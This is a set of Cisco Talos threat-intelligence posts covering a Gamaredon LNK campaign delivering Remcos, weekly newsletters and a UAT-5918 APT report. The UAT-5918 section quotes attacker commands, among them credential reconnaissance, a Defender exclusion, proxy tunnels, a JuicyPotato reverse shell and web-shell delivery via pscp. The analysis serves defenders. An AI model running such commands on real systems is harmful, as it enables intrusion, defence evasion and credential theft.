In this podcast, Joe, Hazel, Bill and Dave break down Talos' Year in Review 2024 and discuss how and why cybercriminals have been leaning so heavily on attacks that are routed in stealth in simplicity.

Monday, March 31, 2025 07:00

Joe, Hazel, Bill and Dave break down Talos' Year in Review 2024 and discuss how and why cybercriminals have been leaning so heavily on attacks that are routed in stealth in simplicity.

The team also provide insights into some of the topics of the report, including the top-targeted vulnerabilities of the year, network-based attacks, adversary toolsets, identity attacks, multi-factor authentication (MFA) abuse, ransomware and AI-based attacks. 

Listen below:

For the full report, head to blog.talosintelligence.com/2024yearinreview

Beers with Talos: Year in Review episode

Download Talos' 2024 Year in Review now, and access key insights on the top targeted vulnerabilities of the year, network-based attacks, email threats, adversary toolsets, identity attacks, multi-factor authentication (MFA) abuse, ransomware and AI-based attacks.

Monday, March 31, 2025 05:53

Welcome to Cisco Talos’ 2024 Year in Review, available for download now. This report is powered by threat telemetry from over 46 million global devices across 193 countries and regions, amounting to more than 886 billion security events per day.  

Explore key insights in topics including the top targeted vulnerabilities of the year, network-based attacks, email threats, adversary toolsets, identity attacks, multi-factor authentication (MFA) abuse, ransomware and AI-based attacks. With Talos' informed analysis and recommendations, you can strategically prioritize your defenses to stay ahead in 2025. 

**2024's Threat Actor Playbook: Stealth and Simplicity **

This year, cybercriminals leaned heavily on stealth and efficiency, favoring straightforward techniques over complex malware and zero-day exploits. Here's more that stood out: 

*   Identity-based attacks were particularly noteworthy, accounting for 60% of Cisco Talos Incident Response cases. 
*   Some of the top-targeted network vulnerabilities affect end-of-life (EOL) devices and therefore have no available patches, despite still being actively targeted by threat actors. 
*   Ransomware actors overwhelmingly leveraged valid accounts for initial access in 2024, with this tactic appearing in almost 70% of cases. They also targeted education entities more than any other sector in 2024, a trend in line with previous years.  
*   Based on Cisco Duo data, identity and access management (IAM) applications were most frequently targeted in MFA attacks, accounting for nearly a quarter of related incidents.  
*   Threat actor use of AI and machine learning largely fell short of industry projections, with actors relying on these technologies to enhance their techniques rather than aid in the creation of new ones. 

Want some quick insights? Here’s a two-minute overview of key findings: 

**Stay informed **

Download Talos’ 2024 Year in Review today, and bookmark our landing page to access forthcoming exclusive interviews with Talos experts, videos, podcasts and more.

Available now: 2024 Year in Review

Cisco Talos is actively tracking an ongoing campaign, targeting users in Ukraine with malicious LNK files which run a PowerShell downloader since at least November 2024.

Friday, March 28, 2025 06:00

*   Cisco Talos is actively tracking an ongoing campaign targeting users in Ukraine with malicious LNK files, which run a PowerShell downloader, since at least November 2024. 
*   The file names use Russian words related to the movement of troops in Ukraine as a lure. 
*   The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to download the second stage Zip file containing the Remcos backdoor. 
*   The second stage payload uses DLL side loading to execute the Remcos payload. 
*   Talos assesses with medium confidence that this activity is associated with the Gamaredon threat actor group. 

**Phishing campaign using the invasion of Ukraine as a theme **

The invasion of Ukraine is a common theme used by the Gamaredon group in their phishing campaigns and this campaign continues the use of this technique. The actor distributes LNK files compressed inside ZIP archives, usually disguising the file as an Office document and using names that are related to the invasion.  

Although Talos was not able to pinpoint the exact method by which these files are distributed, it is likely that Gamaredon continues to send phishing e-mails with either the ZIP file directly attached to it or containing a URL link to download the file from a remote host.  

Below are some examples of file names used in this campaign: 

Original Name 

Translation 

3079807576 (Шашило О.В)/ШАШИЛО Олександр Віталійович.docx.lnk 

3079807576 (Shashilo O.V)/SHASHILO Oleksandr Vitaliyovich.docx.lnk 

3151721177 (Рибак С.В)/РИБАК Станіслав Вікторович.docx.lnk 

3151721177 (Rybak S.V)/RYBAK Stanislav Viktorovich.docx.lnk 

3407607951 (Жолоб В.В)/ЖОЛОБ Владислав Вікторович.docx.lnk 

3407607951 (Zholob V.V)/ZHOLOB Vladislav Viktorovich.docx.lnk 

3710407173 (Гур'єв П.А)/ГУР'ЄВ Павло Андрійович.docx.lnk 

3710407173 (Gur'ev P.A)/GUR'EV Pavlo Andriyovich.docx.lnk 

Вероятное расположение узлов связи, установок РЭБ и расчетов БПЛА противника. ЮГ КРАСНОАРМЕЙСКА.docx.lnk 

Probable location of communication nodes, electronic warfare installations and enemy UAV calculations. SOUTH OF THE RED ARMY.docx.lnk 

ГУР'ЄВ Павло Андрійович.docx.lnk 

GUR'EV Pavlo Andriyevich.docx.lnk 

Координаты взлетов противника за 8 дней (Красноармейск).xlsx.lnk 

Coordinates of enemy takeoffs for 8 days (Krasnoarmeysk).xlsx.lnk 

Позиции противника запад и юго-запад.xlsx.lnk 

Positions of the enemy west and southwest.xlsx.lnk 

РИБАК Станіслав Вікторович.docx.lnk 

RYBAK Stanislav Viktorovich.docx.lnk 

ШАШИЛО Олександр Віталійович.docx.lnk 

SHASHILO Oleksandr Vitaliyevich.docx.lnk 

The translation for these names shows the intent of this campaign in using a war-related theme. We can see some of the files use names of Russian or Ukrainian agents, as well as names alluding to troop movements in the region of conflict. 

These files contain metadata indicating only two machines were used in creating the malicious shortcut files. As we mentioned in a previous blog Gamaredon tends to use a short list of machines when creating the LNK files for their campaigns and the ones used in this campaign were previously seen by Talos in incidents related to this threat group. 

The LNK files contain PowerShell code used to download and execute the next stage payload, as well as a decoy file which is shown to the user after the infection occurs as a way to disguise the compromise.  

The PowerShell code uses the cmdlet Get-Command to indirectly execute the functions to download and execute the payload, which could be an attempt to bypass string-based detection by antivirus solutions.  

The servers used in this campaign are based out of Germany and Russia, and at the time of our assessment, all of them return HTTP error 403 when attempting to download the payload files.  

That indicates that either the files were taken offline, or access to the file is being restricted. Gamaredon is known to restrict access to their payload servers only to victims located in Ukraine. We have found evidence in public sample databases that these servers were still hosting the files for specific regions while returning access denied errors in our tests, like this sample available in the "Any.run” public sandbox: 

*   https://app.any.run/tasks/f9dc0beb-b125-478d-9091-739d2e3325be 

**Network infrastructure associated with Campaign **

The servers used in this campaign are mostly hosted in two Internet Service Providers (ISP): GTHost and HyperHosting: 

IP 

ASN 

ISP 

146\[.\]185\[.\]233\[.\]96 

63023 

gthost 

146\[.\]185\[.\]233\[.\]101 

63023 

gthost 

146\[.\]185\[.\]239\[.\]45 

63023 

gthost 

80\[.\]66\[.\]79\[.\]91 

60602 

hyperhosting 

80\[.\]66\[.\]79\[.\]195 

60602 

hyperhosting 

81\[.\]19\[.\]131\[.\]95 

63023 

ispipoceanllc 

80\[.\]66\[.\]79\[.\]159 

60602 

hyperhosting 

80\[.\]66\[.\]79\[.\]200 

60602 

hyperhosting 

80\[.\]66\[.\]79\[.\]155 

60602 

hyperhosting 

146\[.\]185\[.\]239\[.\]51 

63023 

gthost 

146\[.\]185\[.\]233\[.\]90 

63023 

gthost 

146\[.\]185\[.\]233\[.\]97 

63023 

gthost 

146\[.\]185\[.\]233\[.\]98 

63023 

gthost 

146\[.\]185\[.\]239\[.\]47 

63023 

gthost 

146\[.\]185\[.\]239\[.\]56 

63023 

gthost 

146\[.\]185\[.\]239\[.\]33 

63023 

gthost 

146\[.\]185\[.\]239\[.\]60 

63023 

gthost 

These servers are used to distribute the payload and the decoy document, but Talos found evidence of at least one server being used as the Command and Control (C2) server for the Remcos backdoor. 

We have also found evidence of an interesting artifact in the DNS resolution for some of these servers. Even though all the communication with these servers is done directly via the IP address, the reverse DNS record for some of these IPs show an invalid entry that is quite unique: 

Figure: Reverse DNS resolution for Gamaredon's campaign. Modeled using Crime Mapper (by @UK\_Daniel\_Card) 

While this doesn't necessarily mean the attackers manually changed these records, it did help uncover at least two additional IPs matching the characteristics of the other servers in this campaign: 

**DLL sideloading used to load Remcos backdoor **

Gamaredon has previously been known to use custom scripts and tools in their attack chains, but Talos has observed the use of Remcos backdoor as an alternative tool in their campaigns. 

Once the ZIP payload is downloaded from the servers, it is extracted to the %TEMP% folder and executed. The binary which is executed is a clean application which in turn loads the malicious DLL via DLL sideloading method. This file is actually a malicious loader which decrypts and executes the final Remcos payload from encrypted files found within the ZIP. 

The PowerShell files we observed downloading the ZIP files contain hints of various applications being abused for DLL side loading, and they contain a mix of clean and malicious files: 

*   DefenderUpdate/DPMHelper.exe 
*   DefenderUpdate/DZIPR.exe 
*   DefenderUpdate/IDRBackup.exe 
*   DefenderUpdate/IUService.exe 
*   DefenderUpdate/madHcCtrl.exe 
*   DefenderUpdate/palemoon.exe 
*   Drvx64/Compil32.exe 
*   Drvx64/IsCabView.exe 
*   Drvx64/TiVoDiag.exe 
*   Drvx64/WiseTurbo.exe 
*   SecurityCheck/Mp3tag.exe 
*   SysDrive/AcroBroker.exe 
*   SysDrive/DPMHelper.exe 
*   SysDrive/IsCabView.exe 
*   SysDrive/palemoon.exe 
*   SysDrive/SbieSvc.exe 
*   SysDrive/steamerrorreporter64.exe 
*   SysDrive/TiVoDiag.exe 
*   SysDrive/vmhost.exe 

We can see in the previously mentioned sample downloaded by “Any.run” that it contains the clean application TivoDiag.exe, as well as two DLLs. The file “mindclient.dll” is the malicious DLL which is loaded by “TivoDiag.exe” during execution. 

The payload binary is a typical Remcos backdoor which is injected into Explorer.exe. It communicates with the C2 server 146\[.\]185\[.\]233\[.\]96 on port 6856: 

**Coverage **

Ways our customers can detect and block this threat are listed below. 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

Snort SIDs for this threat:  

Snort 2: 64707, 64708 

Snort 3:  301171 

**Indicators of Compromise **

IOCs for this threat can be found in our GitHub repository here.

Gamaredon campaign abuses LNK files to distribute Remcos backdoor

In this blog post, Joe covers the very basics of money laundering, how it facilitates ransomware cartels, and what the regulatory future holds for cybercrime.

Thursday, March 27, 2025 14:01

Welcome to this week’s edition of the Threat Source newsletter. 

Howdy friends! One of things I learned early on in cyber security is that crime does, in fact, pay. It can pay **very** well, actually. If it didn’t, we wouldn’t have ransomware cartels raking in obscene amounts of money year after year. Ransomware victims pay ransoms with cryptocurrency — typically Bitcoin. A criminal who has their ill-gotten BTC gains then needs to introduce it into a banking system that lets them spend that crypto currency with no questions asked.  

You might be unsurprised to learn that that isn’t as easy as it sounds, but it’s also not a new problem. In the 1980s, South American drug cartels had a similar issue. They were making obscene amounts of money and had massive piles of cash. However, one cannot show up and start dropping massive amounts of money buying very expensive things without drawing legal attention. Plus, it turns out, cash was the preferred way to bribe corrupt officials. As a result, they found legal and banking loopholes, and less than reputable financial practices in the U.S and in other countries to inject ill-gotten money into a legitimate banking system where they could access the funds.  

This is called money laundering, and it is at the heart of every successful organized crime organization. Money Laundering 101 is done in three basic steps: Placement, Layering, and Integration.  

1.  **Placement:** You need to get your money into the financial system(s). 
2.  **Layering:** You need to move the money around so it’s harder to trace and to link it to the crime.  
3.  **Integration:** Now that the connection to the crime is obfuscated, you can spend that money. You can invest it, buy expensive cars, or whatever. That money is now in someone else’s pocket. I used to joke that Ferrari dealerships don’t exactly accept cryptocurrency, but it turns out that joke is now on me. More and more businesses now accept cryptocurrency as a direct means of payment it seems.  

We often think of the crime of ransomware attacks at the point of impact and victimization, but rarely do we think of the reverse — the money that is paid out that flows back into the cartel and its affiliates. Cryptocurrency is _fantastic_ for money laundering. It lags far behind regulatory standards, is largely anonymous, and can be “mixed” and directed to decentralized exchanges where Know Your Customer (KYC) and Anti-Money Laundering (AML) controls are not applied.  

So why am I bringing this up? Well, law enforcement attacking money laundering infrastructure really works. If you can impact how criminals launder their money, you put the brakes on the crime itself happening. After all, what good are the spoils of crime If you can’t do anything with it? 

My fear is that regulatory climates have shifted, which will allow laundering to more easily happen. Time will tell if I’m right, and I don’t want to be.

**The one big thing **

I’m a huge fanboy for clever evasion tactics. Cascading Style Sheets (CSS) evasion tactics in spam emails is just a wicked cool trick. Game knows game, and I have to say, this is super smart. Spam filters play a constant cat and mouse game against adversaries. It goes to show that the threat actors are always innovating neat tricks to exploit victims. 

**Why do I care? **

Spam emails account for a massive threat footprint, especially in enterprise email security. Any attack that sneaks malicious spam emails through a spam filter is worth paying attention to. 

**So now what? **

Knowing is half the battle. Time to look at your email defenses and shore them up. Consider an email proxy service or something similar to help augment your email threat defense.

**Top security headlines of the week **

**Airport outages:** Malaysia PM says country rejected $10 million ransom demand (The Record) 

**Satellites!** I am an absolute sucker for space hacking. ENISA released a great guide on securing commercial space assets. (ENISA)  

**One-click phishing attacks:** Google hastily patched a Chrome zero-day vulnerability exploited by an APT. (Dark Reading) 

**Can’t get enough Talos? **

*   Patch Tuesday was a doozy this time. Check out our blog post here. 
*   Also, keep your eyes peeled: Talos’ 2024 Year in Review will be available for download on Monday, Mar. 31. 

**Upcoming events where you can find Talos **

*   RSA (April 28 – May 1, 2025) San Francisco, CA 
*   PIVOTcon (May 7 – 9) Malaga, Spain 
*   CTA TIPS 2025 (May 14 – 15, 2025) Arlington, VA 
*   Cisco Live U.S. (June 8 – 12, 2022) San Diego, CA

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5**   
MD5: ff1b6bb151cf9f671c929a4cbdb64d86    
VirusTotal : https://www.virustotal.com/gui/file/7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5    
Typical Filename: endpoint.query   
Claimed Product: Endpoint-Collector   
Detection Name: W32.File.MalParent     

**SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca**     
MD5: 71fea034b422e4a17ebb06022532fdde     
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca    
Typical Filename: VID001.exe    
Claimed Product: N/A      
Detection Name: Coinminer:MBT.26mw.in14.Talos  

**SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91**   
MD5: 7bdbd180c081fa63ca94f9c22c457376     
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details%C2%A0    
Typical Filename: c0dwjdi6a.dll     
Claimed Product: N/A      
Detection Name: Trojan.GenericKD.33515991   

**SHA 256:9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**    
MD5: 2915b3f8b703eb744fc54c81f4a9c67f    
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
Typical Filename: VID001.exe    
Detection Name: Simple\_Custom\_Detection

Money Laundering 101, and why Joe is worried

In this week’s Threat Source newsletter, William pitches a fun comparison between baseball legend Ichiro Suzuki and the unsung heroes of information security, highlights newly released UAT-5918 research, and shares an exciting new Talos video.

Thursday, March 20, 2025 14:00

Welcome to this week’s edition of the Threat Source newsletter. 

“Tomorrow, and tomorrow, and tomorrow / Creeps in this petty pace from day to day / To the last syllable of recorded time.” - Shakespeare’s _Macbeth_ 

"But I am very poorly today and very stupid and I hate everybody and everything. One lives only to make blunders." - Charles Darwin’s letter to Charles Lyell 

 “Another day, another box of stolen pens.” - Homer Simpson 

Some people are blessed with the ability to deal with monotony, and some are maddened beyond all recourse by it. In the worlds of both information security and baseball, the ability to overcome tedium is paramount. To be great — not just very good — requires the kind of devotion that many people cannot fathom. 

Ichiro Suzuki is one the greatest players in baseball history and a phenomenal hitter. His dedication led him to practice his swing every day, taking hundreds of swings from both sides of the plate even though he solely batted from the left. He practiced from the right side simply to stay in balance. Ichiro understood that changing your perspective enhances your strengths. 

In cybersecurity, the ability to track and defend against living-off-the-land binaries (LoL bins) is the kind of tedium that garners Hall of Fame results. Cybercriminals and state-sponsored actors exploit built-in tools across all platforms, hiding in the noise of trusted and normal traffic. Once logged in, often with valid credentials, detecting and countering their activity becomes a much more challenging and tedious game, especially for newly minted junior analysts.  

Take some time each day to look at the correlated data from a different source, a different perspective. If you normally look at reconnaissance activity from specific devices, take a few moments to trace the path attackers took across non-security devices for a fuller understanding.  

Ultimately, it comes down to knowing your environment, just as Ichiro worked through the tedium to know his swing. Take the time to learn it from several angles instead of simply banging away from the same view. When all else fails, take a break, walk away, and breathe before getting back in the batter’s box and taking another 500 swings at the tee to become a .300 hitter.

_Pssst! The devil on William's shoulder here. Want to procrastinate and avoid today’s tedium? Curious about what Talos does and how we defend organizations from the latest cyber attacks? Check out this new animated video. From threat hunting, detection building, vulnerability discoveries and incident response, we show up every day to try and make the internet a safer place._

**The one big thing **

Cisco Talos released a blog highlighting research into UAT-5918 which has been targeting critical infrastructure entities in Taiwan. UAT-5918's post-compromise activity, tactics, techniques, and procedures (TTPs), and victimology overlaps the most with Volt Typhoon, Flax Typhoon, Earth Estries, and Dalbit intrusions we’ve observed in the past.

**Why do I care? **

Understanding the actions of motivated and capable threat actors is at the core of defending against them. Threat actors continue to leverage a plethora of open-source tools for network reconnaissance to move through the compromised enterprise, and we see this with UAT-59128. UAT-5918's intrusions harvest credentials to obtain local and domain level user credentials and the creation of new administrative user accounts to facilitate additional channels of access, such as RDP to endpoints of significance to the threat actor.  

Typical tooling used by UAT-5918 includes networking tools such as FRPC, FScan, In-Swor, Earthworm, and Neo-reGeorg. They harvest credentials by dumping registry hives, NTDS, and using tools such as Mimikatz and browser credential extractors. These credentials are then used to perform lateral movement via either RDP, WMIC (PowerShell remoting), or Impacket.

**So now what? **

Use the IOCs associated with the campaign in the blog post to search for evidence of incursion within your own environment. Use this exercise as a means of verifying that you have visibility of the systems on your network and that you are able to search for known malicious IOCs across platforms and datasets.

**Top security headlines of the week**

**New ChatGPT attacks:** Attackers are actively exploiting a flaw in ChatGPT that allows them to redirect users to malicious URLs from within the artificial intelligence (AI) chatbot application. There were more than 10,000 exploit attempts in a single week originating from a single malicious IP address (DarkReading)  

**Not your usual spam:** Generative AI spammers are brute forcing social media and search algorithms with nightmare-fuel videos, and it’s working. (404 media) 

**Zero-day Windows vulnerability:** An unpatched security flaw impacting Microsoft Windows has been exploited by 11 state-sponsored groups from China, Iran, North Korea, and Russia as part of data theft, espionage, and financially motivated campaigns that date back to 2017. (The Hacker News)

**Can’t get enough Talos? **

*   Blog: Miniaudio and Adobe Acrobat Reader vulnerabilities 
*   Blog: Abusing with style: Leveraging cascading style sheets for evasion and tracking

**Upcoming events where you can find Talos **

Amsterdam 2025 FIRST Technical Colloquium Amsterdam (March 25-27, 2025) Amsterdam, NL   
RSA (April 28-May 1, 2025)  San Francisco, CA     
CTA TIPS 2025 (May 14-15, 2025) Arlington, VA    
Cisco Live U.S. (June 8 – 12, 2025) San Diego, CA

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5**  
MD5: ff1b6bb151cf9f671c929a4cbdb64d86   
VirusTotal : https://www.virustotal.com/gui/file/7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5   
Typical Filename: endpoint.query  
Claimed Product: Endpoint-Collector  
Detection Name: W32.File.MalParent   

**SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca**    
MD5: 71fea034b422e4a17ebb06022532fdde    
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
Typical Filename: VID001.exe   
Claimed Product: N/A     
Detection Name: Coinminer:MBT.26mw.in14.Talos 

**SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91**  
MD5: 7bdbd180c081fa63ca94f9c22c457376    
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details%C2%A0   
Typical Filename: c0dwjdi6a.dll    
Claimed Product: N/A     
Detection Name: Trojan.GenericKD.33515991 

**SHA 256:9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**   
MD5: 2915b3f8b703eb744fc54c81f4a9c67f   
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507   
Typical Filename: VID001.exe   
Detection Name: Simple\_Custom\_Detection

Tomorrow, and tomorrow, and tomorrow: Information security and the Baseball Hall of Fame

UAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft, uses a combination of web shells and open-sourced tooling to conduct post-compromise activities to establish persistence in victim environments for information theft and credential harvesting.

By Jung soo An, Asheer Malhotra, Brandon White, and Vitor Ventura.

*   Cisco Talos discovered a malicious campaign we track under the UAT-5918 umbrella that has been active since at least 2023. 
*   UAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft, uses a combination of web shells and open-sourced tooling to conduct post-compromise activities to establish persistence in victim environments for information theft and credential harvesting. 
*   We assess that UAT-5918's post-compromise activity, tactics, techniques, and procedures (TTPs), and victimology overlaps the most with Volt Typhoon, Flax Typhoon, Earth Estries, and Dalbit intrusions we’ve observed in the past.

**UAT-5918’s activity cluster****Overview **

Talos assesses with high confidence that UAT-5918 is an advanced persistent threat (APT) group that targets entities in Taiwan to establish long-term persistent access in victim environments. UAT-5918 usually obtains initial access by exploiting N-day vulnerabilities in unpatched web and application servers exposed to the internet. The threat actor will subsequently use a plethora of open-source tools for network reconnaissance to move through the compromised enterprise. 

The activity that we monitored suggests that the post-compromise activity is done manually with the main goal being information theft. Evidently, it also includes deployment of web shells across any discovered sub-domains and internet-accessible servers to open multiple points of entry to the victim organizations. UAT-5918's intrusions harvest credentials to obtain local and domain level user credentials and the creation of new administrative user accounts to facilitate additional channels of access, such as RDP to endpoints of significance to the threat actor.

Typical tooling used by UAT-5918 includes networking tools such as FRPC, FScan, In-Swor, Earthworm, and Neo-reGeorg. Credential harvesting is accomplished by dumping registry hives, NTDS, and using tools such as Mimikatz and browser credential extractors. These credentials are then used to perform lateral movement via either RDP, WMIC (PowerShell remoting), or Impacket. 

**UAT-5918 activity cluster overlapping **

UAT-5918's tooling and TTPs overlap substantially with several APT groups including Volt Typhoon, Flax Typhoon and Dalbit. 

Figure 1. UAT-5918 TTPs and tooling overlaps with similar APT groups.

There is a significant overlap in post-compromise tooling and TTPs with Volt Typhoon, such as using ping and tools like In-Swor for network discovery; gathering system information such as drive and partition; gathering logical drive information such as names, IDs, size, and free spaces; credential dumping from web browser applications; using open-source tools such as frp, Earthworm, and Impacket for establishing control channels; and the absence of custom-made malware. The U.S. government assesses that Volt Typhoon is a PRC state-sponsored actor conducting cyberattacks against U.S. critical infrastructure. 

Multiple tools used in this intrusion also overlap with tooling used by Flax Typhoon in the past, such as the Chopper web shell, Mimikatz, JuicyPotato, Metasploit, WMIC and PowerShell, along with the use of tactics such as relying on RDP and other web shells to persist in the enterprise and WMIC for gathering system information. The U.S. government attributes Flax Typhoon, a Chinese government-sponsored threat actor, to the Integrity Technology Group, a PRC-based company.

Additionally, tooling such as FRP, FScan, In-Swor, and Neo-reGeorg, as well as filepaths and names used by UAT-5918, overlap with those used by Tropic Trooper. Tropic Trooper’s malware suite, specifically Crowdoor Loader and SparrowDoor, overlap with the threat actors known as Famous Sparrow and Earth Estries. We have also observed overlaps in tooling and tactics used in this campaign operated by UAT-5918 and in operations conducted by Earth Estries, including the use of FRP, FScan, Webshells, Impacket, living-off-the-land binaries (LoLBins), etc. Furthermore, we’ve discovered similar tooling between UAT-5918 and Dalbit consisting of port scanners, proxying tools, reverse shells, and reconnaissance TTPs.

It is worth noting that a sub-set of tools UAT-5918 uses such as LaZagne, SNetCracker, PortBrute, NetSpy etc., have not been seen being used by the aforementioned threat actors in public reporting. It is highly likely that this tooling might be exclusively used by UAT-5918 or their usage by other related groups may have been omitted in publicly available disclosures. 

**Victimology and targeted verticals **

UAT-5918 also overlaps with the previously mentioned APT groups in terms of targeted geographies and industry verticals, indicating that this threat actor’s operations align with the strategic goals of the aforementioned set of threat actors. 

We have primarily observed targeting of entities in Taiwan by UAT-5918 in industry verticals such as telecommunications, healthcare, information technology, and other critical infrastructure sectors. Similar verticals and geographies have also been targeted by APT groups such as Volt Typhoon, Flax Typhoon, Earth Estries, Tropic Trooper, and Dalbit. 

**Initial access and reconnaissance **

UAT-5918 typically gains initial access to their victims via exploitation of known vulnerabilities on unpatched servers exposed to the internet. Activity following a successful compromise consists of preliminary reconnaissance to identify users, domains, and gather system information. Typical commands executed on endpoints include: 

ping <IP> 
net user 
systeminfo 
arp –a 
route print 
tasklist 
tasklist -v 
netstat -ano 
whoami 
ipconfig 
query user 
cmd /c dir c:\\users\\<username>\\Desktop 
cmd /c dir c:\\users\\<username>\\Documents 
cmd /c dir c:\\users\\<username>\\Downloads 

 Initial credential reconnaissance is carried out using the cmdkey command: 

cmdkey /list 

The threat actor then proceeds to download and place publicly available red-teaming tools (illustrated in subsequent sections) on endpoints to carry out further actions. In some cases, UAT-5918 also disabled Microsoft Defender’s scanning of their working directories on disk: 

powershell.exe -exec bypass Add-MpPreference -ExclusionPath <working\_directory> 
powershell Get-MpPreference 

**Post-compromise tooling **

UAT-5918's post-compromise tooling consists of web shells, some of which are publicly available, such as the Chopper web shell, multiple red-teaming and network scanning tools, and credentials harvesters.

**Reverse proxies and tunnels **

The actor uses FRP and Neo-reGeorge to establish reverse proxy tunnels for accessing compromised endpoints via attacker controlled remote hosts. The tools are usually downloaded as archives and extracted before execution:

The Earthworm (ew) tool for establishing proxies is also run: 

**Port scanning **

FScan is a port and vulnerability scanning tool that can scan ranges of IP addresses and Ports specified by the attackers:

Talos has observed the actor scanning of these ports in particular: 

 21 22 80 81 83 91 135 443 445 888 808 889 5432 8000 8080 54577 11211

The threat actor also relies extensively on the use of In-Swor, a publicly available tool authored and documented by Chinese speaking individuals, for conducting port scans across ranges of IP addresses. A sample command of In-Swor's use is: 

Run\[.\]exe -h <ip\_range>/24 -nopoc -pwdf pw\[.\]txt -p 1521,6379 -t 4 

In-Swor was used to scan for the following ports across IP address ranges: 

22		SSH 
80		HTTP 
135		RPC 
445		SMB 
1433		SQL server 
1521		Oracle DBs 
3306		MySQL 
3389		RDP 
4194 		Kubernetes? 
5432 		PostgreSQL 
5900 		VNC 
6379 		Redis 
10248 	    ? 
10250 	    Kubernetes 
10255 	    MongoDB 

In other instances, In-Swor was used to establish proxy channels:

svchost\[.\]exe proxy -l \*:22 -k 9999   
svchost\[.\]exe proxy -l \*:443 -k 9999   
svchost\[.\]exe proxy -hc -l \*:443 -k 99997654    
svchost\[.\]exe -hc proxy -l \*:443 -k 99997654    
svchost\[.\]exe proxy -l 443 –v 

 svchost\[.\]exe -type server -proto tcp -listen :443    
svchost\[.\]exe -type server -proto http -listen :443    
svchost\[.\]exe -type server -proto rhttp -listen :443 

In addition to FScan, PortBrute, another password brute forcer for multiple protocols such as FTP, SSH, SMB, MYSQL, MONGODB, etc., was also downloaded and used:

PortBruteWin(5).exe -up <username>:<password> 

**Additional network reconnaissance **

The threat actor uses two utilities for monitoring the current connection to the compromised hosts — NirSoft's CurrPorts utility and TCPView. Both tools are likely used to perform additional network discovery to find accessible hosts to pivot to: 

C:\\Users\\<compromised\_user>\\Desktop\\cports-x64/cports.exe   
C:\\Users\\<compromised\_user>\\Desktop\\TCPView\\tcpview64.exe 

The threat actor also uses PowerShell-based scripts to attempt SMB logins to specific endpoints already identified by them:

powershell\[.\]exe -file C:\\ProgramData\\smblogin-extra-mini.ps1 

Netspy, another tool authored and documented by Chinese speaking individuals, is a network segmentation discovery tool that UAT-5918 employs occasionally for discovery. The fact that the operator had to check the tool help denotes the lack of automation and the unusual usage of such tool:

netspy\[.\]exe -h 

**Gathering local system information **

The attackers may also gather commands to profile the endpoint and its drives:

wmic diskdrive get partitions /value    
fsutil fsinfo drives    
wmic logicaldisk get DeviceID,VolumeName,Size,FreeSpace    
wmic logicaldisk get DeviceID,VolumeName,Size,FreeSpace /format:value 

**Maintaining persistent access to victims **

The threat actor attempts to deploy multiple web shells on systems they find are hosting web applications. The web shells are typically ASP or PHP-based files placed deep inside housekeeping directories such as image directories, user files etc. 

The threat actor uses JuicyPotato’s (a privilege escalation tool) web shell variant that allows JuicyPotato to act as a web shell on the compromised system accepting commands from remote systems to execute:

JuicyPotato is then run to spawn cmd\[.\]exe to run a reverse shell that allows the threat actor to run arbitrary commands: 

Run.exe -t t -p c:\\windows\\system32\\cmd.exe -l 1111 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 

UAT-5918 will also use PuTTY’s pscp tool to connect to and deliver additional web shells to accessible endpoints (likely servers) within the network:

pscp\[.\]exe <web\_shell> <user>@<IP>:/var/www/html/<web\_shell> 

